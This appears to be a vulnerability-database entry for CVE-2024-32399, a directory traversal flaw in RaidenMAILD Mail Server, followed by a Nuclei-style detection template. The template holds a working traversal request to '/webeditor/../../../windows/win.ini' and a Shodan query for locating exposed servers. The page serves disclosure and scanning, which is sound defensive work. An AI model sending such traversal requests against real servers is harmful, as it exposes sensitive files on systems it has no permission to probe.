漏洞描述
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
CVE-2024-32399: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
PoC代码[已公开]
id: CVE-2024-32399
info:
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
author: DhiyaneshDK
severity: high
description: |
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
impact: |
Attackers can traverse directories to obtain sensitive information from the mail server.
remediation: |
Update RaidenMAILD to a version later than 4.9.4 that patches the directory traversal vulnerability.
reference:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
- https://github.com/NN0b0dy/CVE-2024-32399
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
epss-score: 0.83509
epss-percentile: 0.99257
cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"RaidenMAILD"
product: raidenmaild
vendor: raidenmaild
tags: cve,cve2024,lfi,raiden,mail,server,vuln
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c157358f52445b598ea47aa5e2918779036aa1d801710c5b7db382a1dce4c70a02200e9458850f2c874892ad1ff91b0ed5a17448a27b293033dcad2fa8d1a9d1f9b5:922c64590222798bb761d5b6d8e72950